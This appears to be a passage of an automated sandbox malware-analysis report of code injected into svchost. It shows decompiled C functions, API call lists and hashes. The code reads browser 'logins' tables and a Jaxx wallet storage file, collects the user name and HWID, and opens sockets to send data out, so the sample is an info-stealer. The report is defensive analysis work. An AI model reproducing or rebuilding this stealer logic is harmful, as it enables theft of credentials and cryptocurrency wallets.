Statement addresses (one per C-code line as listed by the plugin, 0x00000000 for lines without an instruction): 0x0bc08a86, 0x0bc08a86, 0x0bc08a86, 0x0bc08a8e, 0x0bc08a93, 0x0bc08a9a, 0x0bc08aa2, 0x0bc08ab1, 0x0bc08ab3, 0x0bc08ab9, 0x0bc08ac2, 0x0bc08ad4, 0x0bc08ad5, 0x0bc08aef, 0x0bc08af7, 0x00000000, 0x00000000, 0x0bc08b05, 0x0bc08b0a, 0x0bc08b11, 0x00000000, 0x0bc08b13, 0x0bc08b15, 0x0bc08b15, 0x00000000, 0x0bc08b11, 0x0bc08b1c, 0x0bc08b22, 0x0bc08b24, 0x0bc08ac4, 0x0bc08ac4, 0x0bc08ac4, 0x0bc08ad3

APIs
• CreateFileA.KERNELBASE(0BC09A62,80000000,00000003,00000000,00000003,00000000,00000000,HWID,?,?,0BC09A62,00000000,?,?,?), ref: 0BC08AB3
• ReadFile.KERNELBASE(?,?,00001000,?,00000000,?,?,0BC09A62,00000000,?,?,?), ref: 0BC08AEF
• FindCloseChangeNotification.KERNELBASE(?,?,0BC09A62,00000000,?,?,?), ref: 0BC08B1C
Note: CreateFileA takes seven parameters; the first seven logged values match the C-code call exactly (GENERIC_READ, share mode 3, OPEN_EXISTING). The entries after them (HWID, ?, ?, 0BC09A62, ...) are neighbouring stack slots captured at the call, so HWID is a string that was on the stack, not an argument. The lpFileName pointer 0BC09A62 was not resolved to a path in this trace, so the page does not show which file is read. The FindCloseChangeNotification entry is the handle close for the file opened at 0BC08AB3; no CloseHandle appears in this function.
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: File$ChangeCloseCreateFindNotificationRead
• String ID: HWID
• API String ID: 2525391649-1176364606
• Opcode ID: ffafe5a687582719cb426d39b0ed1fcaef73a5488097d6f5f58cf20c3c4ace70
• Instruction ID: 121c2fdac6a150c252802556d22affc377e9ed2cefd4704d58926315f4f9fcbc
• Opcode Fuzzy Hash: ffafe5a687582719cb426d39b0ed1fcaef73a5488097d6f5f58cf20c3c4ace70
• Instruction Fuzzy Hash: 4D116535A21168EFDB219A65DC44BDB7BACEB09766F008295B549E2180CA709FC4DBA0
Uniqueness
• Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                        			E0BC02B55(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20) {
                                                                                                                                        				CHAR* _v8;
                                                                                                                                        				char _v12;
                                                                                                                                        				char _v16;
                                                                                                                                        				char _v20;
                                                                                                                                        				void* __esi;
                                                                                                                                        				int _t26;
                                                                                                                                        				void* _t27;
                                                                                                                                        				void* _t28;
                                                                                                                                        				void* _t31;
                                                                                                                                        				void* _t34;
                                                                                                                                        				intOrPtr _t35;
                                                                                                                                        				signed int _t50;
                                                                                                                                        				signed int _t51;
                                                                                                                                        
                                                                                                                                        				if(_a16 == 5) {
                                                                                                                                        					_t35 = _a12;
                                                                                                                                        					_push(_t35);
                                                                                                                                        					_t50 =  &_v8;
                                                                                                                                        					_t27 = 2;
                                                                                                                                        					_t26 = E0BC0326D(_t27,  &_v12,  &_a16, _t50);
                                                                                                                                        					if(_a16 == 1) {
                                                                                                                                        						_t26 = lstrcmpiA(_v8, "logins");
                                                                                                                                        						if(_t26 == 0) {
                                                                                                                                        							_t26 = E0BC0326D(_t26,  &_v12,  &_a16, _t50, _t35);
                                                                                                                                        							if(_a16 == 1) {
                                                                                                                                        								_t26 = lstrcmpA("table", _v8);
                                                                                                                                        								if(_t26 == 0) {
                                                                                                                                        									_push(_t35);
                                                                                                                                        									_t28 = 3;
                                                                                                                                        									_t26 = E0BC0326D(_t28,  &_v12,  &_a16, _t50);
                                                                                                                                        									if(_a16 == 0) {
                                                                                                                                        										_push(_t35);
                                                                                                                                        										_v20 =  *_v8;
                                                                                                                                        										_t31 = 4;
                                                                                                                                        										_t26 = E0BC0326D(_t31,  &_v12,  &_a16, _t50);
                                                                                                                                        										if(_a16 == 1) {
                                                                                                                                        											_t51 = _t50 | 0xffffffff;
                                                                                                                                        											 *0xbc10d60 = _t51;
                                                                                                                                        											 *0xbc10d40 = _t51;
                                                                                                                                        											 *0xbc10d18 = _t51;
                                                                                                                                        											_t26 = E0BC03786(_v8, E0BC02C5D);
                                                                                                                                        											_v16 = 1;
                                                                                                                                        											if( *0xbc10d60 != _t51 &&  *0xbc10d40 != _t51 &&  *0xbc10d18 != _t51) {
                                                                                                                                        												_t34 = E0BC0341E(_a4, _a8, _v20,  &_v16, _a20, E0BC02D22); // executed
                                                                                                                                        												return _t34;
                                                                                                                                        											}
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return _t26;
                                                                                                                                        			}

                                                                                                                                        0x0bc02b62
                                                                                                                                        0x0bc02b68
                                                                                                                                        0x0bc02b6b
                                                                                                                                        0x0bc02b6e
                                                                                                                                        0x0bc02b77
                                                                                                                                        0x0bc02b78
                                                                                                                                        0x0bc02b84
                                                                                                                                        0x0bc02b92
                                                                                                                                        0x0bc02b9a
                                                                                                                                        0x0bc02ba7
                                                                                                                                        0x0bc02bb0
                                                                                                                                        0x0bc02bbe
                                                                                                                                        0x0bc02bc6
                                                                                                                                        0x0bc02bcc
                                                                                                                                        0x0bc02bd5
                                                                                                                                        0x0bc02bd6
                                                                                                                                        0x0bc02be0
                                                                                                                                        0x0bc02be8
                                                                                                                                        0x0bc02be9
                                                                                                                                        0x0bc02bf1
                                                                                                                                        0x0bc02bf2
                                                                                                                                        0x0bc02bfb
                                                                                                                                        0x0bc02c00
                                                                                                                                        0x0bc02c08
                                                                                                                                        0x0bc02c0e
                                                                                                                                        0x0bc02c14
                                                                                                                                        0x0bc02c1a
                                                                                                                                        0x0bc02c20
                                                                                                                                        0x0bc02c29
                                                                                                                                        0x0bc02c50
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02c55
                                                                                                                                        0x0bc02c29
                                                                                                                                        0x0bc02bfb
                                                                                                                                        0x0bc02be0
                                                                                                                                        0x0bc02bc6
                                                                                                                                        0x0bc02bb0
                                                                                                                                        0x0bc02b9a
                                                                                                                                        0x0bc02b84
                                                                                                                                        0x0bc02c5c

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpiA.KERNEL32(?,logins), ref: 0BC02B92
                                                                                                                                        • lstrcmpA.KERNEL32(table,?), ref: 0BC02BBE
                                                                                                                                          • Part of subcall function 0BC03786: StrStrIA.SHLWAPI(?,0BC0DA88,00000001,?,?,0BC02C1F,0BC02C5D), ref: 0BC03795
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmplstrcmpi
                                                                                                                                        • String ID: logins$table
                                                                                                                                        • API String ID: 3524194181-3800951466
                                                                                                                                        • Opcode ID: 41af7e2380f9ca63be5def90e1dc9fe6cdc849ecfcf07adbf1c52c8d17fe5dbd
                                                                                                                                        • Instruction ID: 8f81f5f5e63b02197163b2c7a698a640f0b45a10ff1408de43dc29921fbbfff5
                                                                                                                                        • Opcode Fuzzy Hash: 41af7e2380f9ca63be5def90e1dc9fe6cdc849ecfcf07adbf1c52c8d17fe5dbd
                                                                                                                                        • Instruction Fuzzy Hash: 9E31B131A3126EEFDF11DF90D949AAE3BB8FB45615F100616F510AA080EB30DBC6CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        C-Code - Quality: 18%
                                                                                                                                        			E0BC017C5(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4) {
                                                                                                                                        				signed int _v12;
                                                                                                                                        				intOrPtr _v24;
                                                                                                                                        				short _v26;
                                                                                                                                        				char _v28;
                                                                                                                                        				void* __edi;
                                                                                                                                        				signed int _t9;
                                                                                                                                        				signed int _t10;
                                                                                                                                        				short _t13;
                                                                                                                                        				intOrPtr _t14;
                                                                                                                                        				signed int _t15;
                                                                                                                                        				char* _t17;
                                                                                                                                        				intOrPtr _t18;
                                                                                                                                        				intOrPtr _t22;
                                                                                                                                        				signed int _t23;
                                                                                                                                        				signed int _t25;
                                                                                                                                        
                                                                                                                                        				_t24 = __esi;
                                                                                                                                        				_t22 = __edx;
                                                                                                                                        				_t18 = __ebx;
                                                                                                                                        				_t9 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_t10 = _t9 ^ _t25;
                                                                                                                                        				_v12 = _t10;
                                                                                                                                        				__imp__#23(2, 1, 6); // executed
                                                                                                                                        				_t23 = _t10;
                                                                                                                                        				if(_t23 != 0xffffffff) {
                                                                                                                                        					E0BC08D5E( &_v28,  &_v28, 0, 0x10);
                                                                                                                                        					_t13 = 2;
                                                                                                                                        					_v28 = _t13;
                                                                                                                                        					__imp__#9(_a4);
                                                                                                                                        					_v26 = _t13;
                                                                                                                                        					if(__esi != 0) {
                                                                                                                                        						_t14 = E0BC01798(_t13, __esi); // executed
                                                                                                                                        						if(_t14 == 0xffffffff) {
                                                                                                                                        							goto L3;
                                                                                                                                        						} else {
                                                                                                                                        							_v24 = _t14;
                                                                                                                                        							_t17 =  &_v28;
                                                                                                                                        							__imp__#4(_t23, _t17, 0x10); // executed
                                                                                                                                        							if(_t17 == 0xffffffff) {
                                                                                                                                        								goto L3;
                                                                                                                                        							} else {
                                                                                                                                        								_t15 = _t23;
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					} else {
                                                                                                                                        						L3:
                                                                                                                                        						__imp__#3(_t23);
                                                                                                                                        						goto L1;
                                                                                                                                        					}
                                                                                                                                        				} else {
                                                                                                                                        					L1:
                                                                                                                                        					_t15 = 0;
                                                                                                                                        				}
                                                                                                                                        				return E0BC09FDC(_t15, _t18, _v12 ^ _t25, _t22, _t23, _t24);
                                                                                                                                        			}

                                                                                                                                        0x0bc017c5
                                                                                                                                        0x0bc017c5

APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 0BC017DC
• htons.WS2_32(0BC01D23), ref: 0BC01804
• closesocket.WS2_32(00000000), ref: 0BC01813
  • Part of subcall function 0BC01798: inet_addr.WS2_32(0BC01821), ref: 0BC0179F
  • Part of subcall function 0BC01798: gethostbyname.WS2_32(0BC01821), ref: 0BC017AF
• connect.WS2_32(00000000,?,00000010), ref: 0BC01831
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: closesocketconnectgethostbynamehtonsinet_addrsocket
• String ID:
• API String ID: 1954806591-0
• Opcode ID: ffdfba3bf88c5b5ba290a8a0cc217c54cbdd62684d082f32aa98eeb64857df88
• Instruction ID: 344f523d1d4f76ace95324904cf47fcafc91db9bd411caa6d6598323bb858b51
• Opcode Fuzzy Hash: ffdfba3bf88c5b5ba290a8a0cc217c54cbdd62684d082f32aa98eeb64857df88
• Instruction Fuzzy Hash: 4901D231A302086ADB109BB8888ABBEB7F9EF05B20F150715F611F61D0DF70864192A1
Uniqueness

Uniqueness Score: 0.56%

C-Code - Quality: 65%
_entry_() {
	long _v8;
	CHAR* _t5;
	int _t6;
	void* _t11;
	signed char _t14;

	_push(_t11);
	_push(_t11);
	E0BC09DF5(E0BC01036(_t11));
	_t5 = LocalAlloc(0x40, 0x181); // LMEM_ZEROINIT buffer that will hold the user name
	_t13 =  &_v8;
	 *0xbc10d04 = _t5; // buffer pointer is kept in a global
	_v8 = 0x101; // in/out buffer size for GetUserNameA
	_t6 = GetUserNameA(_t5,  &_v8); // executed
	if(_t6 == 0) { // lookup failed: release the buffer and clear the global
		E0BC08D3D( *0xbc10d04);
		 *0xbc10d04 =  *0xbc10d04 & 0x00000000;
		_pop(_t13);
	}
	__imp__OleInitialize(0); // executed
	E0BC01153(_t14); // executed
	E0BC01507(_t13); // executed
	E0BC015D2(_t14); // executed
	ExitProcess(0);
}

APIs
• LocalAlloc.KERNEL32(00000040,00000181), ref: 0BC01082
• GetUserNameA.ADVAPI32(00000000,?), ref: 0BC0109B
• OleInitialize.OLE32(00000000), ref: 0BC010BA
• ExitProcess.KERNEL32 ref: 0BC010D1
  • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: Local$AllocExitFreeInitializeNameProcessUser
• String ID:
• API String ID: 4119324191-0
• Opcode ID: 778d881cffe7395aefc21f6849b03d8c42a1b9f3d5e57e483ea3e64c660b8216
• Instruction ID: bc3b3340f427298fe5baa1831b7b4d4f28dc7bd91b467def9c3d17e7b383ff92
• Opcode Fuzzy Hash: 778d881cffe7395aefc21f6849b03d8c42a1b9f3d5e57e483ea3e64c660b8216
• Instruction Fuzzy Hash: DEF05EB0574201AFE7147B70D90FB1A76D8EB10746F008718B15AE50D0EEB4EA409B22
Uniqueness

Uniqueness Score: 1.85%

C-Code - Quality: 19%
E0BC01885(intOrPtr _a4) {
	signed int _v8;
	intOrPtr _v264;
	char _v268;
	signed int _v272;
	char _v276;
	signed int _t11;
	char* _t15;
	intOrPtr _t16;
	intOrPtr _t19;
	intOrPtr _t22;
	intOrPtr _t23;
	intOrPtr _t24;
	signed int _t25;

	_t11 =  *0xbc10000; // 0xbb40e64e
	_v8 = _t11 ^ _t25; // stack cookie
	_v272 = _v272 & 0x00000000; // timeval.tv_usec = 0
	_v264 = _a4; // fd_set.fd_array[0] = the socket passed in
	_t15 =  &_v268;
	_v276 = 0x5a; // timeval.tv_sec = 0x5a seconds
	_v268 = 1; // fd_set.fd_count = 1
	__imp__#18(0, _t15, 0, 0,  &_v276); // executed; WS2_32 ordinal 18 is select(0, &readfds, NULL, NULL, &timeout)
	if(_t15 == 0xffffffff || _t15 == 0) { // SOCKET_ERROR or timeout: socket is not readable
		_t16 = 0;
	} else {
		_t16 = 1;
	}
	return E0BC09FDC(_t16, _t19, _v8 ^ _t25, _t22, _t23, _t24); // cookie check, then return readable flag
}

APIs
• select.WS2_32(00000000,?,00000000,00000000,?), ref: 0BC018D0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: select
• String ID: Z$]Kt
• API String ID: 1274211008-539628341
• Opcode ID: 1a0b0d4fa91d42d7acb8179a5213cc545adebc2a035f0589f8c062d57daeeb7e
• Instruction ID: 3afb71f11a0221df52b87efa70a662904cddf7183cc76bf3a21d9d6a405cbe22
• Opcode Fuzzy Hash: 1a0b0d4fa91d42d7acb8179a5213cc545adebc2a035f0589f8c062d57daeeb7e
• Instruction Fuzzy Hash: CBF01D70A2420C9FDB50DB64CC567EAB7F8EB08304F5046A5A559EA1C0DBF0DBC48F90
Uniqueness

Uniqueness Score: 100.00%

APIs
• RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0BC05C61
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC05D0B
• RegCloseKey.ADVAPI32(?), ref: 0BC05D17
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID:
• API String ID: 1332880857-0
• Opcode ID: a4c5db39df2dfce03e72550a84ae6030237c2437c195f1507d5f699066b272e7
• Instruction ID: dedb7f613e48a566e3166646510a8231b438c7e33faa08f70d70f8e97880a810
• Opcode Fuzzy Hash: a4c5db39df2dfce03e72550a84ae6030237c2437c195f1507d5f699066b272e7
• Instruction Fuzzy Hash: FF21C9B5821128AFCB609F65CC45ADABBFDFF18254F00C1A5A989A2140DE719A85DFE0
Uniqueness

Uniqueness Score: 0.03%

APIs
• RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0BC05B6B
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC05C09
• RegCloseKey.ADVAPI32(?), ref: 0BC05C15
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID:
• API String ID: 1332880857-0
• Opcode ID: c00f85125e5af1df12ae8fa792ed72c19d419f2ef3c08b9e805bc8ce804e5886
                                                                                                                                        • Instruction ID: 45a965a2435c344ea862d1ee773acff83e8127cee072e81897b45b25f7910f6b
                                                                                                                                        • Opcode Fuzzy Hash: c00f85125e5af1df12ae8fa792ed72c19d419f2ef3c08b9e805bc8ce804e5886
                                                                                                                                        • Instruction Fuzzy Hash: C321E6B582112CAFCB609B65CC45EDABBFCFF09254F00C1A5A989A2140DE709B85CFE0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E0BC07461(void* __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				CHAR* _t10;
                                                                                                                                        				CHAR* _t11;
                                                                                                                                        				void* _t13;
                                                                                                                                        				intOrPtr* _t14;
                                                                                                                                        				void* _t19;
                                                                                                                                        				CHAR* _t33;
                                                                                                                                        				void* _t34;
                                                                                                                                        				void* _t36;
                                                                                                                                        				char** _t39;
                                                                                                                                        
                                                                                                                                        				_t34 = E0BC08C9C(_a4, __edx, __eflags, 0x87);
                                                                                                                                        				_t10 = E0BC091BE(0x1a);
                                                                                                                                        				 *_t39 = "\\Jaxx\\Local Storage\\file__0.localstorage";
                                                                                                                                        				_t11 = E0BC08F32(_t10, _t33);
                                                                                                                                        				__imp__CreateStreamOnHGlobal(0, 1,  &_v8, _t36, _t19, __ecx, __ecx);
                                                                                                                                        				_t13 = E0BC08A86(_t11, _v8, __edx, _t11); // executed
                                                                                                                                        				_t42 = _t13;
                                                                                                                                        				if(_t13 != 0) {
                                                                                                                                        					E0BC037E4(_v8, _t42, _a4, 0x87, E0BC074DE);
                                                                                                                                        				}
                                                                                                                                        				_t14 = _v8;
                                                                                                                                        				_t43 = _t14;
                                                                                                                                        				if(_t14 != 0) {
                                                                                                                                        					 *((intOrPtr*)( *_t14 + 8))(_t14);
                                                                                                                                        				}
                                                                                                                                        				return E0BC08D0C(_a4, _t34, _t43);
                                                                                                                                         			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC091BE: LocalAlloc.KERNEL32(00000040,00000185,?,?,0BC02182,?), ref: 0BC091C9
                                                                                                                                          • Part of subcall function 0BC091BE: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,00000000,?,?,0BC02182,?), ref: 0BC091DA
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0BC0749A
                                                                                                                                          • Part of subcall function 0BC08A86: CreateFileA.KERNELBASE(0BC09A62,80000000,00000003,00000000,00000003,00000000,00000000,HWID,?,?,0BC09A62,00000000,?,?,?), ref: 0BC08AB3
                                                                                                                                        Strings
                                                                                                                                        • \Jaxx\Local Storage\file__0.localstorage, xrefs: 0BC07481
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Createlstrlen$AllocFileFolderGlobalLocalPathStreamlstrcatlstrcpy
                                                                                                                                        • String ID: \Jaxx\Local Storage\file__0.localstorage
                                                                                                                                        • API String ID: 950119092-2567200104
                                                                                                                                        • Opcode ID: 38081a9845efc7ff1652c2b71023166ed78a2f3b6b2d658acbbc86707415c792
                                                                                                                                        • Instruction ID: c13a238ed48ba969a5cfdcd6914db5922f313371661c224895a0cb760a316ab5
                                                                                                                                        • Opcode Fuzzy Hash: 38081a9845efc7ff1652c2b71023166ed78a2f3b6b2d658acbbc86707415c792
                                                                                                                                        • Instruction Fuzzy Hash: E1018472734204BFDB04ABA4DC46E9E77ADDF45250F104466F649DB2C0DEB1DE419BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.44%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC090FC(CHAR* __ecx) {
                                                                                                                                        				void* _t3;
                                                                                                                                        
                                                                                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                        					L4:
                                                                                                                                        					return 0;
                                                                                                                                        				} else {
                                                                                                                                        					_t3 = CreateFileA(__ecx, 0x80, 0, 0, 3, 0, 0); // executed
                                                                                                                                        					if(_t3 == 0xffffffff) {
                                                                                                                                        						goto L4;
                                                                                                                                        					} else {
                                                                                                                                        						FindCloseChangeNotification(_t3); // executed
                                                                                                                                        						return 1;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                         			}

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,0BC01F1F), ref: 0BC09112
                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0BC0911E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ChangeCloseCreateFileFindNotification
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 727422849-0
                                                                                                                                        • Opcode ID: 1f0089d432ea22d22b694493d193c6492a1c2f376e6f155a931b27977b0fffcf
                                                                                                                                        • Instruction ID: be46d12d86aa0b3af3d0eac1b2e4ea5707d85783ba6e43fecb6d9b26e758913e
                                                                                                                                        • Opcode Fuzzy Hash: 1f0089d432ea22d22b694493d193c6492a1c2f376e6f155a931b27977b0fffcf
                                                                                                                                        • Instruction Fuzzy Hash: E6D05EE077220039EB2426341C0CB3725ECCB09216F140B90B661D40C1EE74CA518121
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        APIs
                                                                                                                                        • inet_addr.WS2_32(0BC01821), ref: 0BC0179F
                                                                                                                                        • gethostbyname.WS2_32(0BC01821), ref: 0BC017AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: gethostbynameinet_addr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1594361348-0
                                                                                                                                        • Opcode ID: f93ca0b0376ac6d2d96a663fc1f46df947d991395a12c709061ba8d57d35e7f6
                                                                                                                                        • Instruction ID: 1681dc22adfc4604a1ad3c3c11b56c577045b6fd622b0b397b2f888fa1b316f6
                                                                                                                                        • Opcode Fuzzy Hash: f93ca0b0376ac6d2d96a663fc1f46df947d991395a12c709061ba8d57d35e7f6
                                                                                                                                        • Instruction Fuzzy Hash: 47E012396211249FDB105F69D848986BBE8EF097F17064260FE19EB3B0C731ED109BC0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                        			E0BC091BE(intOrPtr _a4) {
                                                                                                                                        				void* _t5;
                                                                                                                                        
                                                                                                                                        				_t5 = LocalAlloc(0x40, 0x185);
                                                                                                                                        				__imp__SHGetFolderPathA(0, _a4, 0, 0, _t5); // executed
                                                                                                                                        				return _t5;
                                                                                                                                         			}

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000185,?,?,0BC02182,?), ref: 0BC091C9
                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,00000000,?,?,0BC02182,?), ref: 0BC091DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocFolderLocalPath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1254228173-0
                                                                                                                                        • Opcode ID: 7c50a904c2d5fd1af68cbbc615b8960591cce651c81eafda6a73e9a857e4bb1d
                                                                                                                                        • Instruction ID: 5d038aee69a59388f22f136475bfdc7bb3ca73b8d4bbb4a97d629848eee6ee4e
                                                                                                                                        • Opcode Fuzzy Hash: 7c50a904c2d5fd1af68cbbc615b8960591cce651c81eafda6a73e9a857e4bb1d
                                                                                                                                        • Instruction Fuzzy Hash: F6D0C9756512287BE7001AA5AC0DEB77EDCEB056A5F014220FF08D6280D5618E1087E0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.25%

                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                        			E0BC02B0B(void* __ecx, void* __eflags, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* _t10;
                                                                                                                                        				intOrPtr* _t11;
                                                                                                                                        				intOrPtr _t13;
                                                                                                                                        				intOrPtr _t20;
                                                                                                                                        				void* _t24; // was used below without a declaration in the decompiler output
                                                                                                                                        
                                                                                                                                        				__imp__CreateStreamOnHGlobal(0, 1,  &_v8, _t13, __ecx, __ecx);
                                                                                                                                        				_t10 = E0BC08A86(_t13, _v8, _t20, _a8); // executed
                                                                                                                                        				_t24 = _t10;
                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                        					E0BC037E4(_v8, _t24, _a4, _a12, E0BC02B55); // executed
                                                                                                                                        				}
                                                                                                                                        				_t11 = _v8;
                                                                                                                                        				if(_t11 != 0) {
                                                                                                                                        					_t11 =  *((intOrPtr*)( *_t11 + 8))(_t11); // vtable slot 2 = IUnknown::Release on the IStream
                                                                                                                                        				}
                                                                                                                                        				return _t11;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0BC02B19
                                                                                                                                          • Part of subcall function 0BC08A86: CreateFileA.KERNELBASE(0BC09A62,80000000,00000003,00000000,00000003,00000000,00000000,HWID,?,?,0BC09A62,00000000,?,?,?), ref: 0BC08AB3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$FileGlobalStream
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 157780020-0
                                                                                                                                        • Opcode ID: 26b063c88fa4cbecb3055e79e5920151aca184ca1e04429e19f1921cd2edc82e
                                                                                                                                        • Instruction ID: 076d8a412a6d259d337f1393e51615e22ed6c500db7676a2fbb89c8d6900ef5c
                                                                                                                                        • Opcode Fuzzy Hash: 26b063c88fa4cbecb3055e79e5920151aca184ca1e04429e19f1921cd2edc82e
                                                                                                                                        • Instruction Fuzzy Hash: 6CF01C71620208FFDB11DF94CC8AF9E776DEB48211F144069FA069E1D0EE72DA01AB20
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        APIs
                                                                                                                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 0BC01869
                                                                                                                                        Memory Dump Source
